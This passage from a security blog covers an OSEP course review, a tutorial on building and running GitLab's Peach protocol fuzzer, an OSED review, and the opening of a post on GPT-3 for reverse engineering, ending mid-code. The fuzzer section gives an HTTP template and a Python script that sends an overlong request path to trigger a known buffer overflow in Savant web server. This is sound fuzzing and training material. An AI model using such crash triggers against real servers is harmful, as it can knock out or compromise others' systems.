  • Cascade
  • Resolute
  • Mantis
  • Fuse
  • Fulcrum

While they were great for practicing various tools like CrackMapExec, some were a bit too CTF-like, especially towards the end of the list. I found the HackTheBox Pro Lab far more useful; Cybernetics consists of about 28 boxes across several networks and applies a lot of the techniques taught in PEN-300. If you have the cash to spare (it's pretty expensive at 90 pounds for a month + initial set up), I'd say go for it, but it's not necessary.

Additionally, I did some payload preparation before the exam. Make sure to collect all the payloads you have written throughout the course and have them ready to deploy. Write down the scripts, commands, and tools you were taught throughout the course and know how to use them. Since PEN-300 provides the compiled binaries of the tools throughout the labs, I recommend saving them all in one place so that you have a canonical version of Mimikatz or Rubeus that you know will work in the exam environment.

You should also prepare a Windows development virtual machine that uses a shared drive from your Kali machine to easily build and test payloads. Even though the labs and exam provide a development machine, it's a little slow over the VPN. Microsoft provides a free Windows development VM that's perfect for the job.

The exam itself is 48 hours (actually 47 hours 45 minutes) and provides several pathways to pass. As per the exam documentation, you can either compromise the final target machine or compromise enough machines to accumulate 100 points.

I took about half a day to pivot through the network and successfully compromise the final machine. Although it was enough to pass, I spent the next one and a half days attempting other machines for practice and writing my report. In general, I think that the course material itself covers what you need for the exam. There's no need to pay for HackTheBox machines – just do your extra miles and complete all the included labs. Overall, the exam is challenging but not impossible, especially with the multiple ways to pass it. Focus on what you've learned, refine your payloads in advance, and you will be able to do it.

After sending in my report on Monday, I received my pass confirmation email on Friday!

Pass Email

Another One Bytes the Dust

With the OSEP down, I'll be taking on EXP-301/OSED to build my vulnerability research skills. Since most cybersecurity professionals these days have to work in interdisciplinary fields rather than in silos, the Offensive Security Certified Expert – Three bundle makes a lot of sense. At the same time, I think the OSEP stands tall on its own as an advanced Red Team penetration testing course. Whether you're looking to take the next step beyond OSCP into Red Teaming or rounding out your offensive security skills, there's something for you.

#infosec #offensivesecurity #cybersecurity

Life's a Peach (Fuzzer): How to Build and Use GitLab's Open-Source Protocol Fuzzer

22 May 2021 at 03:08

Motivation

The Peach protocol fuzzer was a well-known protocol fuzzer whose parent company, Peach Tech, was acquired in 2020 by GitLab. While Peach Tech had previously released a Community Edition of Peach fuzzer, it lacked many key features and updates found in the commercial editions. Fortunately, GitLab has open-sourced the core protocol fuzzing engine of Peach under the name "GitLab Protocol Fuzzer Community Edition," allowing anyone to build and deploy it. For simplicity, I will refer to the new open-sourced version as Peach Fuzzer.

Peachy

As expected of an early-stage project, the build process is complicated and not well-documented. In addition, first-time users may have trouble understanding how to use the fuzzer. Moreover, GitLab's open-sourced version still lacks important resources such as fuzzing templates, which means you will have to write them on your own.

To that end, this article aims to demonstrate an end-to-end application of Peach Fuzzer, from build to deployment. Look out for a subsequent article where I will touch on the full workflow of finding and exploiting vulnerabilities using Peach Fuzzer.

Building Peach Fuzzer

Although Peach Fuzzer can be built on both Linux and Windows, it appeared that the Linux build flow was broken at the time of writing. As such, I built the application in Windows, for Windows.

I used the latest version of Windows 10 Professional even though Microsoft does provide handy virtual machines for free. Due to the onerous dependency requirements, I highly recommend building Peach Fuzzer in a fresh virtual machine to avoid messing up your own regular setup.

Dependencies

The existing documentation on the GitLab repository lists the following build prerequisites:

  • Python 2.7

  • Ruby 2.3

  • doxygen, java, xmllint, xsltproc

  • .NET Framework 4.6.1

  • Visual Studio 2015 or 2017 with C++ compilers

  • TypeScript Compiler (tsc) v2.8

  • Intel Pin

Let us go through them one by one.

Python 2.7

Yep, it is already deprecated, but the build flow is explicitly written for 2.7 and is not compatible with Python 3 (I tried). Get the x86-64 MSI installer at https://www.python.org/downloads/release/python-2718/ and install it, and remember to select the installation option to add it to your PATH! Alternatively, if you already have Python 3 installed, you can continue to install 2.7, and then run Python with py -2.7 <PYTHON COMMANDS>.

Ruby 2.3

While the documentation recommends an outdated version of Ruby, I was fine installing Ruby 2.7.2-1 (x64) from the RubyInstaller download page (without DevKit). Remember to select the option to add this to your PATH. Although you do not need the MSYS2 toolchain, it would not hurt to have it installed.

java, xmllint, xsltproc

This is a long list and it would probably be tedious to install these dependencies separately. Thankfully, these packages are mostly available via the Chocolatey Windows package manager. Start by installing Chocolatey with the instructions found at https://chocolatey.org/install, then run the following commands in an elevated PowerShell window:

    choco install jdk8
    choco install xsltproc
    choco install git

You need to install git as well to clone the Peach Fuzzer repository later.

doxygen

doxygen is a special case: you will need to install it from the installer at https://www.doxygen.nl/download.html. After that, edit the PATH environment variable to include C:\Program Files\doxygen\bin.

.NET Framework 4.6.1, Visual Studio 2015 or 2017 with C++ compilers

Here is where things get a bit complicated. Even though the documentation states .NET Framework 4.6.1, it appears that 4.5.1 is necessary as well to prevent the build process from crashing. Since the latest version of Visual Studio is 2019, you cannot download Visual Studio 2017 directly. Go to this download page to get the older versions and create a free Visual Studio Dev Essentials account to access it. Download Visual Studio Community 2017 (version 15.9) and start the installation.

You will be prompted to install the different developer components. I selected the Desktop development with C++ workload. In addition, I chose the .NET Framework 4.6.1 and 4.5.1 SDKs with targeting packs under "Individual components". You can see a list of my installation components in the right sidebar for your reference.

Visual Studio

Visual Studio Component Installation Screen

TypeScript Compiler

Although tsc appears to be installed by default in Node (by running npx tsc), you will also have to install this globally. Install the LTS version of Node at https://nodejs.org/en/, then run npm install typescript --global in an elevated command prompt and you are all set!

Intel Pin

This is another tricky one. The documentation recommends v3.2 81205 but it is so outdated that the Intel page no longer lists it. You can still download the builds directly from one of these links:

  1. Windows: http://software.intel.com/sites/landingpage/pintool/downloads/pin-3.2-81205-msvc-windows.zip

  2. Linux: http://software.intel.com/sites/landingpage/pintool/downloads/pin-3.2-81205-gcc-linux.tar.gz

  3. MacOS: http://software.intel.com/sites/landingpage/pintool/downloads/pin-3.2-81205-clang-mac.tar.gz

Since you are building for Windows, you only need the Windows version. Open the zip file and copy the pin-3.2-81205-msvc-windows folder to protocol-fuzzer-ce\3rdParty\pin.

Hidden Dependencies

There are a few more dependencies for Peach to work, but they are not listed in the documentation:

  • .NET Framework 4.5.1

  • WinDBG

  • WireShark

  • Visual C++ Redistributable for Visual Studio 2012 Update 4

.NET Framework 4.5.1 can be installed with Visual Studio as described above. To install WinDBG, follow the instructions at https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools. WireShark has a standard installer which you can use without any issues. This will allow you to use the Windows Debugger and packet monitors.

Since Peach Fuzzer uses !exploitable to triage crashes, you will need to install the specific version Visual C++ Redistributable for Visual Studio 2012 Update 4 from https://www.microsoft.com/en-us/download/details.aspx?id=30679. I tested other versions and it only works with the 2012 version.
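With this many prerequisites, a quick pre-flight check can save a failed configure run. The following is only a minimal sketch, assuming the tools are exposed on PATH under the executable names listed in REQUIRED_TOOLS (these names are my assumption and may differ on your machine). It does not check versions, Visual Studio components, Intel Pin, or the Visual C++ Redistributable.

```python
import shutil

# Assumed executable names for the command-line prerequisites; adjust as needed.
REQUIRED_TOOLS = ["python", "ruby", "java", "xmllint", "xsltproc", "doxygen", "tsc", "git"]


def find_missing(tools, which=shutil.which):
    """Return the subset of tools that cannot be resolved on PATH."""
    return [tool for tool in tools if which(tool) is None]


if __name__ == "__main__":
    missing = find_missing(REQUIRED_TOOLS)
    if missing:
        print("Not found on PATH: " + ", ".join(missing))
    else:
        print("All listed tools were found on PATH.")
```

A tool reported as missing may simply be installed under a different name or not yet added to PATH, so treat the output as a hint rather than a verdict.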

Build Commands

Finally, it is time to build! Clone the repository and cd into it and run python waf configure (or py -2.7 waf configure in my case). If all goes well, you should see this:

WAF Configure

If the build fails, it is time to start debugging. I found the error messages from configure helpful as most of the time, the failure is caused by a missing dependency. You can also use the Visual Studio installer to repair your installation in case binaries were removed.

After configuration, run python waf build. This will build your documentation as well as the Windows x86 and x64 variants in protocol-fuzzer-ce\slag. Finally, run python waf install to create the final binaries and output to protocol-fuzzer-ce\output.

WAF Install

As we did not specify the variant for installation, the installer will generate files for both debug and release for x86 and x64. For most purposes, you will want to use the release version of x64; this will be your Peach directory.
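If you expect to rebuild often, the three waf steps above can be chained in a small driver script. This is a rough sketch rather than part of the Peach tooling: it assumes the Python launcher invocation py -2.7 used earlier, and repo_dir is a hypothetical path to your clone. The script itself is written for Python 3 and only shells out to Python 2.7 for waf.

```python
import subprocess

WAF_STEPS = ("configure", "build", "install")


def waf_commands(python_cmd=("py", "-2.7")):
    """Return the waf invocations in the order described in the text."""
    return [list(python_cmd) + ["waf", step] for step in WAF_STEPS]


def run_build(repo_dir, python_cmd=("py", "-2.7"), runner=subprocess.run):
    """Run configure, build and install in order, stopping at the first failure."""
    for cmd in waf_commands(python_cmd):
        print("Running: " + " ".join(cmd))
        # check=True makes subprocess.run raise CalledProcessError on a non-zero exit code
        runner(cmd, cwd=repo_dir, check=True)


# Example (hypothetical path): run_build(r"C:\src\protocol-fuzzer-ce")
```

Stopping at the first failing step keeps the configure error messages at the bottom of the output, which is where the missing dependency usually shows up.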

Running Peach Fuzzer

Writing Templates

After building Peach Fuzzer, it is time to put it through its paces. Peach Fuzzer is a generational fuzzer, which means it generates test cases from user-defined templates. This is especially useful for highly structured file types or protocols with strict checksums and formatting.

I will demonstrate Peach Fuzzer's capabilities by running my template against a small test case: a remote buffer overflow via an HTTP request to Savant Web Server 3.1. It is always good to validate your templates against a known vulnerable application. Although the open-source version of Peach Fuzzer does not come with any built-in templates, there are pretty good templates (known as Pits in Peach) available such as this HTTP Pit.

Before writing your templates, I highly recommend reading the "Peach Pro Developer Guide" that is generated in output\doc\sdk\docs as part of the build process. It provides details about the individual components of the templates, as well as the arguments and inputs for the various Peach binaries which I will not be discussing in this article. Now back to testing the template:

I adapted the previous HTTP Pit file into a generic GET HTTP template:

 <?xml version="1.0" encoding="utf-8"?>
    <Peach xmlns="http://peachfuzzer.com/2012/Peach" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://peachfuzzer.com/2012/Peach ../peach.xsd">

        <DataModel name="GetRequest">
            <String value="GET " mutable="false" token="true"/> 
            <String value="/"/>             
            <String value=" HTTP/1.1" mutable="false" token="true"/>
            <String value="\r\n" mutable="false" token="true"/>

            <String value="User-Agent: " mutable="false" token="true"/>
            <String value="Mozilla/5.0"/>   
            <String value="\r\n" mutable="false" token="true"/>

            <String value="Host: ##HOST##:##PORT##" mutable="false" token="true"/>
            <String value="\r\n" mutable="false" token="true"/>

            <String value="Accept: " mutable="false" token="true"/>
            <String value="text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"/>   
            <String value="\r\n" mutable="false" token="true"/> 
            
            <String value="Accept-Language: " mutable="false" token="true"/>
            <String value="en-us"/> 
            <String value="\r\n" mutable="false" token="true"/>

            <String value="Accept-Encoding: " mutable="false" token="true"/>
            <String value="gzip, deflate"/> 
            <String value="\r\n" mutable="false" token="true"/>

            <String value="Referer: " mutable="false" token="true"/>
            <String value="http://##HOST##/"/>  
            <String value="\r\n" mutable="false" token="true"/>     

            <String value="Cookie: " mutable="false" token="true"/>
            <String value=""/>
            <String value="\r\n" mutable="false" token="true"/>

            <String value="Connection: " mutable="false" token="true"/>
            <String value="Keep-Alive" mutable="false" token="true"/>   
            <String value="\r\n" mutable="false" token="true"/>
            <String value="\r\n" mutable="false" token="true"/>
        </DataModel>    
        
        <DataModel name="GetResponse">
            <String value="" />
        </DataModel>

        <StateModel name="StateGet" initialState="Initial">
            <State name="Initial">
                <Action type="output">
                    <DataModel ref="GetRequest"/>
                </Action>
                <Action type="input">
                    <DataModel ref="GetResponse"/>
                </Action>
            </State>
        </StateModel>   

        <Agent name="LocalAgent">
            <Monitor class="WindowsDebugger" />
        </Agent>

        <Test name="Default">
            <StateModel ref="StateGet"/>
            <Agent ref="LocalAgent"/>
            <Publisher class="TcpClient">
                <Param name="Host" value="##HOST##"/>
                <Param name="Port" value="##PORT##"/>
            </Publisher>
            
            <Logger class="File">
                <Param name="Path" value="Logs"/>
            </Logger>
            <Strategy class="Sequential" />
        </Test> 
    </Peach>

In order to support the parameters, Peach Pits must also be accompanied by a configuration file:

    <?xml version="1.0" encoding="utf-8"?>
    <PitDefines>
        <All>
            <String key="HOST" value="127.0.0.1" name="Host" description="Server host name or IP"/>
            <String key="PORT" value="21" name="Port" description="Server port number"/>
        </All>
    </PitDefines>
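To make the relationship between the two files concrete, here is a small illustration of how ##KEY## placeholders could be resolved from a PitDefines file. This is not Peach's actual implementation, only a sketch of the idea under my own assumptions; load_defines and substitute are hypothetical helper names, and the port in the sample is an arbitrary example value.

```python
import re
import xml.etree.ElementTree as ET

# Shortened sample in the shape of the configuration file above (port is an example value).
SAMPLE_CONFIG = """
<PitDefines>
    <All>
        <String key="HOST" value="127.0.0.1" name="Host" description="Server host name or IP"/>
        <String key="PORT" value="8080" name="Port" description="Server port number"/>
    </All>
</PitDefines>
"""


def load_defines(config_xml):
    """Collect key/value pairs from every element that carries a 'key' attribute."""
    root = ET.fromstring(config_xml.strip())
    return {el.get("key"): el.get("value", "") for el in root.iter() if el.get("key") is not None}


def substitute(template_text, defines):
    """Replace each ##KEY## placeholder that has a definition; leave unknown keys untouched."""
    def replace(match):
        return defines.get(match.group(1), match.group(0))
    return re.sub(r"##([A-Za-z0-9_]+)##", replace, template_text)


if __name__ == "__main__":
    defines = load_defines(SAMPLE_CONFIG)
    print(substitute('<String value="Host: ##HOST##:##PORT##"/>', defines))
```

Leaving unknown placeholders untouched makes a missing define easy to spot in the rendered output.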

Thereafter, copy http_get.xml and http_get.xml.config into {PEACH DIRECTORY}\bin\pits\Net\. You can rename the folder from Net to any other category. Note: Your templates MUST be in a subfolder of pits, otherwise they will not turn up in the Peach GUI.

Next, from the Peach directory, run .\Peach.exe. This will start up the web interface on port 8888 and open it up in your browser. Lucky you!

Peach Web Interface

Configuring a Fuzzing Session

We are nearly there! Continue by installing the vulnerable version of Savant from the Exploit Database page.

Next, go to Library where you should see your HTTP Get template listed. Click it to start a new Pit configuration. Since we are fuzzing Savant's Web Server, name the configuration Savant.

In the next screen, select Variables. From here, overwrite the parameters to match the host and port that Savant will occupy.

Configure Variables

Next, you will need to add Monitors. If you are running Peach directly from the CLI, these would already be defined in your template. However, the web interface appears to require manual configuration. Let us look at the two steps to do so:

Step One: add an agent. This defaults to local, meaning the agent will run in the Peach instance itself rather than in a different host. Name it something reasonable, like LocalAgent.

Step Two: add a monitor. Since we want to monitor the Savant process for crashes, we must add a Windows Debugger monitor and set the Executable parameter to the path of Savant.exe.

Configure Monitors

Peach Fuzzer also comes with lots of useful monitors and automations such as a popup clicker (e.g. closing registration reminders) and network monitoring. For now, the Windows Debugger is all you need.

Save your monitoring configuration, then go to Test to perform a test run. This will run Savant with one test case to ensure everything goes smoothly. If all goes well, it is time to run your fuzzing session!

Successful Test

Running a Fuzzing Session

Go back to the main dashboard to start your session. Cross your fingers! In Savant's case, it will only be a few seconds before you hit your first fault (crash)!

Fuzzing Session

Peach Fuzzer will automatically triage your crashes with WinDbg's !exploitable in the Risk column (in the screenshot everything is UNKNOWN due to the missing 2012 Redistributable dependency, but it should be properly triaged if it is installed).

You can click on individual test cases to view the proper description and memory of the crash.

Fault Detail

You can also download the test case that caused the crash. If we inspect the test case for Savant, we will see that Peach Fuzzer modified the GET / path to GET ///////////... The WinDBG output also suggests that EIP has been overwritten. With that, we have proven that the template can successfully discover the known request header buffer overflow vulnerability in Savant by fuzzing it. Now go forth and find another target!
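To confirm a fault outside of Peach, you can replay a request against your own local test instance and watch the debugger. The sketch below is an assumption-laden illustration: it rebuilds a trimmed version of the GET request from the template with a configurable path, and the path length of 300 in the usage comment is an arbitrary example, not the value Peach used. For a faithful reproduction, send the bytes of the downloaded test case instead.

```python
import socket


def build_get_request(host, port, path="/"):
    """Build a trimmed-down GET request in the same shape as the template."""
    lines = [
        "GET {} HTTP/1.1".format(path),
        "User-Agent: Mozilla/5.0",
        "Host: {}:{}".format(host, port),
        "Connection: Keep-Alive",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def send_payload(host, port, payload, timeout=5.0):
    """Send raw bytes to a local test target and return whatever comes back, if anything."""
    with socket.create_connection((host, port), timeout=timeout) as conn:
        conn.sendall(payload)
        try:
            return conn.recv(4096)
        except OSError:
            # A crashed or unresponsive target typically resets or times out here.
            return b""


# Example against a local lab instance only (host, port and length are placeholders):
# send_payload("127.0.0.1", 80, build_get_request("127.0.0.1", 80, path="/" * 300))
```

An empty response is only a hint that something went wrong; the debugger attached to Savant remains the source of truth for whether the crash reproduced.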

Conclusion

In terms of free and open-source template-based generational fuzzers, researchers do not have many options. The biggest alternative is the Python "Monsters Inc." line of fuzzers, namely Sulley, later BooFuzz, and now Fuzzowski by NCC Group. GitLab's open-source Peach Fuzzer presents a big step forward in terms of usability and sophistication, albeit limited by the lack of prebuilt templates. If you have templates from a previous purchase of Peach Fuzzer Professional, you are in luck. However, the secret sauce of these fuzzers is always the templates. Sadly, GitLab will not be open-sourcing the Pro templates and will only be offering them behind a commercial product later this year. Without a large library of templates, the usefulness of Peach Fuzzer is limited.

If you are willing to put in the work to build your own templates, I think that Peach Fuzzer is a fantastic starter kit to get you into the fuzzing game. However, when it comes to more advanced fuzzing, Peach falls short. While it claims to be a "smart" fuzzer, it was documented in an older era of fuzzing. It is perhaps more accurate to call it a generational or file format-aware fuzzer that fuzzes based on prewritten templates. These days, coverage-guided/feedback-driven fuzzers such as AFL and Honggfuzz may be considered more advanced approaches. Peach only uses Intel Pin to minimise corpora and does not appear to use it for actual fuzzing.

Peach, however, still has its place in any researcher's toolkit, especially if your focus is on specific file structures. I found that Peach is especially useful for prototyping potential fuzzing targets due to the quick setup and ability to fuzz black-box targets without a harness. It can still pick up surface-level vulnerabilities and help highlight potentially vulnerable targets for deeper fuzzing.

#infosec #cybersecurity #fuzzing #hacking

ROP and Roll: EXP-301 Offensive Security Exploit Developer (OSED) Review and Exam

23 June 2021 at 15:21

The Rule of Three

EXP-301 Logo by Offensive Security

The Windows User Mode Exploit Development (EXP-301) course and the accompanying Offensive Security Exploit Developer (OSED) certification is the last of the three courses to be released as part of the Offensive Security Certified Expert – Three (OSCE3) certification. Since the appointment of the new CEO Ning Wang in 2019, Offensive Security has revamped its venerable lineup of courses and certifications, culminating in the new OSCE3 announced at the end of 2020. As I've discussed in my Offensive Security Experienced Penetration Tester (OSEP) review, this makes a lot of sense from a marketing and sales strategy standpoint. Although Offensive Security was best known for its no-expiry certifications, it has since retired a number of them, including the old OSCE and more recently Offensive Security Wireless Attacks (OSWP). It has also introduced a number of recurring revenue subscription products such as the Offensive Security Proving Grounds, PWK365, and more. Oh, and it's raising the price of exam retakes from $150 to $249. These are all great business decisions for Offensive Security, but for the regular cybersecurity professional, is the EXP-301/OSED worth it?

When it comes to learning exploit development, the foundations haven't really changed since Corelan's classic exploit writing tutorial series in 2009. You start with the basic overflows and structured exception handlers, then move on to increasingly challenging bypasses such as data execution prevention and address space layout randomisation. You learn to do return oriented programming, custom shell coding, and more intermediate topics – all in x86. That's because even though the modern exploit development environment is incredibly different from 2009, the fundamentals have largely remained the same. However, it's still a steep learning curve for most because you have to reconfigure your thought process around stacks and assembly code – not exactly the most intuitive concepts.

That's why a foundational exploit development course in x86 is still relevant today and I felt that EXP-301 does this very well. You could definitely just do Corelan's free exploit writing tutorial series, but you won't be working on modern tools such as WinDBG and IDA. Additionally, EXP-301 provides a huge amount of material to guide you every step of the way until it finally clicks in your head. I can't emphasize this enough – whether you are working in x86 or x64, in x64dbg or WinDBG, unless you have achieved a high level of familiarity with manipulating the stack in assembly-land, you will face endless difficulties. The labs are excellent at honing particular aspects of exploit development before the exam brings them all together in classic "Try Harder" fashion. EXP-301 shines when it taps on Offensive Security's exploit heritage.

After clearing the OSEP at the end of February 2021, I took the 60-day EXP-301/OSED package from March to May 2021, and finally cleared the exam in mid-June. At the time of writing, this costs $1299. As my job role is pretty multi-disciplinary, I found it necessary to build up my exploit development skills and the OSED came at the right time. I also can't deny that the lure of the OSCE3 "halo" certification pushed me to take it – the marketing is working! While I have previously done the Corelan series and the occasional exploit development tutorial, I didn't quite grok it. In addition, while I was more comfortable in application security and penetration testing, I felt that I lacked that extra punch in my offensive skills without binary exploitation. Here's my review along with some tips and tricks to maximise your OSED experience.

What You Should Know

Offensive Security recommends the following pre-requisites to take the Windows User Mode Exploit Development course:

  • Familiarity with debuggers (ImmunityDBG, OllyDBG)
  • Familiarity with basic exploitation concepts on 32-bit
  • Familiarity with writing Python 3 code

The following optional skills are recommended:

  • Ability to read and understand C code at a basic level
  • Ability to read and understand 32-bit Assembly code at a basic level

However, while I think these pre-requisites are sufficient for the first half of the course, once you move into return-oriented programming and reverse engineering, understanding 32-bit assembly code is no longer optional. You should really build up your familiarity with assembly and reverse engineering as much as possible before taking the course. In addition, you would save a lot of time in the earlier sections by completing some of the Corelan exploit writing tutorials first – EXP-301 tracks it pretty closely.

As with all Offensive Security courses, EXP-301 teaches you everything you need to know on top of the recommended pre-requisites, but unless you have the time to thoroughly study the materials on a consistent basis, you may find it difficult to fully grasp the concepts without additional preparation.

What You Will Learn

Unlike PEN-300/OSEP, which taught a broad array of topics in penetration testing, EXP-301 sticks close to the fundamentals and goes deep. As mentioned earlier, you start with the basics of buffer overflows and SEH overwrites, but the course quickly moves on to reverse engineering with IDA, custom shell coding your egg hunters and reverse shells, ROP chaining, and finally format string attacks.

I found that EXP-301 is especially strong in three areas: reverse engineering, custom shell code, and ROP. While some might question the usefulness of teaching IDA Free when Ghidra is a thing, I'd say that the two are pretty interchangeable at this level. Furthermore, IDA Pro remains the standard for advanced users, so it's better to get acquainted with IDA first. Interestingly, by forcing you to rely on IDA Free's limited set of features, the course makes you better at reverse engineering in the long run. While I considered myself fairly proficient at the basics of reverse engineering, having completed two-thirds of last year's Flare-On challenges, I still relied on bad analysis patterns and leaned hard on the pseudocode crutch. With only the disassembly and limited signatures in IDA Free, I could no longer do that.

ROP chaining and custom shell coding can be incredibly hard to master because it's difficult for most people to intuitively understand these concepts. Before the course, while I knew the basic principles of ROP, I could hardly get started. EXP-301 properly explains every step of the process, working through each assembly instruction over multiple exercises until it flows naturally for you. By the middle of the course, I was comfortable enough to apply ROP to my own vulnerability research and successfully built exploits for real-world bugs that are now pending full disclosure.

However, the two format string attacks chapters were a little weak. Placed at the end of the course, they cover format string reads and writes respectively. While the concepts are taught well, I could definitely have used a bit more practice in exploiting them. Perhaps the course could have taught more attack vectors and format string variants.

Overall, each chapter builds well on the previous one, creating a solid foundation for exploit development.

What You Should Also Learn By Yourself

As an exploit development rather than a vulnerability research course, EXP-301 only covers the reverse engineering route to finding bugs. You won't learn fuzzing or source code review which can be entire courses in themselves. You may want to learn these in order to properly conduct vulnerability research on your own. You can check out my Peach Fuzzer tutorial for a beginner's quickstart to fuzzing – there are plenty of write-ups and tutorials out there. One big difference between EXP-301 and the Corelan tutorials is that the former only deals with network-based exploits, while some of the exploits covered by Corelan are file-based. This is another huge domain to cover.

Other than that, the obvious next steps would be the concepts covered by the Advanced Windows Exploitation course: kernel exploits, type confusion, heap spraying and more – approaching real mastery. You wouldn't really expect these in a foundational exploit development course, but they are necessary to go far.

How I Prepared for the Exam

To prepare for the exam, I tried to complete all the exercises and extra miles, missing out only two super-hard ones (you will know what they are; the course tells you as much). I also completed all of the lab machines.

Additionally, I worked on building my automation. Epi has a fantastic OSED-scripts repo that automates various tasks in exploit development, such as categorising ROP gadgets and generating building blocks for custom shell code. However, if you use them without understanding them, it's a recipe for disaster – focus on understanding how and why these scripts work by reading the code and stepping through various exercises with them. I contributed my own additions and edits to the repo as I practised, which helped me better understand the underlying concepts. You could do what I did and modify the repo or write your own automation, but the end goal should be solidifying your fundamentals, not taking short cuts.

Other than that, I also applied some of the course knowledge in my own vulnerability research. As mentioned earlier, these vulnerabilities are pending full disclosure but I'm pretty excited about them because they demonstrated an immediate application of the skills I learned in the course.

I also highly recommend joining the official Offensive Security Discord server. You get to chat with other students and Offensive Security staff as you work through the course, which really helps to clear up misunderstandings or clarify concepts. Big shoutout to @TheCyberBebop @epi @bonjoo @hdtran and more!

I was very apprehensive about the exam, and I was right to be. While the OSWE and OSEP exams were generally in line with what I expected based on the courses and labs, the OSED exam was a whole other beast. It was kind of like looking at everything I had been taught in the course through a funhouse mirror – same same but different. Try Harder different. At every turn, I felt like obstacles had been specifically placed in my way to make things more difficult. I advise you to read the instructions properly and manage your time well. By the end of the exam, I had completed all three challenges, although one of them only worked on the development machine. I realised why only when writing my report – a real facepalm moment! Let's just say I didn't sleep much during that 48-hour exam.

I submitted my report on Wednesday and received the exciting news that I had passed the following Tuesday afternoon. I also received a second congratulatory message that I had achieved the OSCE3.

OSCE3 Certification

Triple Threat

To answer the question, "Is EXP-301 worth it?" you can think about it in two ways. As a foundational exploit development course, I think it's fantastic. It really gets you to a level of familiarity with the fundamentals such as reading assembly code and manipulating the stack that is hard to achieve with free write-ups. As part of the OSCE3, I think it is a nice testament to your all-round skill and ability to withstand suffering, but not strictly necessary. While offensive security roles tend to be fairly inter-disciplinary, it is also perfectly possible to stay within the application security or penetration testing domains without ever needing to read a line of assembly code. Only take this on if you're sure you need the exploit development skills or if you have the resources to splash out on completing the trilogy for the sake of it.

As to what's next, Offensive Security continues to refresh its product line under the new direction of the CEO. It recently announced that the Wireless Attacks course would be retired, possibly paving the way for a modern Internet-Of-Things course. At its current price-to-value ratio, Offensive Security sits in between the mass-market Udemy-style courses and the sky-high SANS and bespoke trainings. Personally, I'm interested to see how it'll shake up this market in the long run.

#offensivesecurity #certification #infosec #cybersecurity

Down the Rabbit Hole: Unusual Applications of OpenAI in Cybersecurity Tooling

17 September 2021 at 13:16

Note: This is the blogpost version of a talk I gave to the National University of Singapore Greyhats club. If you prefer video, you can watch it here:

Introduction

Now that Mr. Robot and The Matrix are back on Netflix, re-watching them has been a strangely anachronistic experience. On the one hand, so much of what felt fresh and original back then now seems outdated, even cringey. After all, the past few years definitely provided no end of “F SOCIETY” moments, not to mention the hijacking of “red pill”... but the shows stand on their own with some of the most arresting opening scenes I've ever watched.

Matrix Cutscene

Mr Robot Cutscene

With AI well into the technology adoption lifecycle, most of the low-hanging fruits have been plucked – in cybersecurity, antivirus engines have integrated machine learning models on the client and in the cloud, while malicious actors abuse synthetic media generation to execute all kinds of scams and schemes. There's a ton of hype and scaremongering for sure, but still good reason to be concerned.

Matrix AI

OpenAI's next-generation GPT-3 language models gained widespread attention last year with the release of the OpenAI API, and were understandably a hot topic at Black Hat and DEF CON this year. A team from Georgetown University's Center for Security and Emerging Technology presented on applying GPT-3 to disinformation campaigns, while my team developed OpenAI-based phishing (and anti-phishing) tools that we shared at Black Hat and DEF CON. After all, the GPT-3 API presented a massive leap in power and access compared to the previous state-of-the-art; estimates by Lambda Labs show more than a hundredfold increase in parameters compared to GPT-2.

Resource | GPT-2 | GPT-3 | GPT-3 API
Time | 1+ weeks | 355 years | <1 minute
Cost | $43k | $4.6m | $0.06/1k tokens
Data size | 40 GB | 45 TB | Negligible
Compute | 32 TPUv3s | 1 Tesla V100 GPU | Negligible
Energy | ? | ? | Negligible
Released | 2019 | 2020 | 2020

However, most research into the malicious applications of AI tends to focus on human factors (scamming, phishing, disinformation). There has been some discussion of AI-powered malware but this remains very much in the proof-of-concept stage. This is partly a function of the kinds of models available to researchers – generative models lend themselves easily to synthetic media, while language models are easily applied to phishing and fake news. Classification problems fit antivirus solutions well. But where do we go from these low-hanging fruits?

OpenAI for Cybersecurity Tooling

Recently, OpenAI released new products that cross into code. First, GitHub developed Copilot based on GPT-3 that provided code auto-completion for programmers. Next, thanks to the data-sharing agreement with GitHub, OpenAI produced Codex, an arguably far more impressive tool that generates code based on plain language instructions.

OpenAI Codex

The shift into coding was partly inspired by early usage of the API beta that revealed that GPT-3 was actually pretty good at parsing code even without fine-tuning. For example, feeding it a prompt like this:

An engineer asked me about what this JavaScript code does:

"""
var minions = ["Bob", "Kevin", "Stuart"];
console.log(minions);
"""

I analyzed it for them, explaining what the assembly does in plain language a software engineer can understand:

Would return:

The code initializes an array with three names, then logs the array to the console. As a human, you can see that this code simply creates an array and logs it to the console.

Of course, given that the model is probabilistic, it also occasionally returned hilarious failures such as:

It creates an array of three integers, and then prints the array to the console.  I asked the engineer to explain the code to me in plain language. He struggled.  Why did it take so much work for him to explain this simple code?  I've noticed something interesting:  Years of experience with programming languages can actually make it harder to explain code.  Why does it take so much work to explain code after you've been programming for many years?  It feels like an effort to explain code using programming language features after you've learned so many of them.

OpenAI also recently released a davinci-instruct beta model that is fine-tuned to parse plain-language instructions and performed better in my own tests. Given that Codex appears to be a mix of davinci-instruct and fine-tuning on code, it would perform even better.

Reverse-Engineering Assembly

With all this in mind, I decided to put OpenAI's models through their paces. One possibility that stood out to me was applying GPT-3 to reverse-engineering assembly code. If it could explain Python or JavaScript code well, how about one layer down? After all, the best malware reverse engineers emphasize that pattern recognition is key. For example, consider the following IDA graph:

IDA graph

To the casual observer like me, it would take some time to read and understand the assembly code before concluding that it was an RC4 cipher key scheduling algorithm. In particular, this is the RC4 cipher from a Metasploit payload used in Flare-On 2020 Challenge 7 – read about my process here. Experienced reverse engineers would be able to quickly zoom into interesting constants (100h – 256 in decimal) and the overall “shape” of the graph to immediately reach the same conclusion.
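For readers who have not seen RC4 before, the following is a minimal Python sketch of the textbook algorithm, not a transcription of the Metasploit payload. The function names `rc4_ksa` and `rc4_crypt` are made up for illustration. It shows where the 256 (100h) constant comes from: the key scheduling loop walks a 256-entry state table.

```python
def rc4_ksa(key: bytes) -> list:
    """Key scheduling: build the 256-entry permutation from the key."""
    state = list(range(256))  # 256 == 0x100, the constant a reverser looks for
    j = 0
    for i in range(256):
        j = (j + state[i] + key[i % len(key)]) % 256
        state[i], state[j] = state[j], state[i]
    return state


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt (RC4 is symmetric) by XORing with the keystream."""
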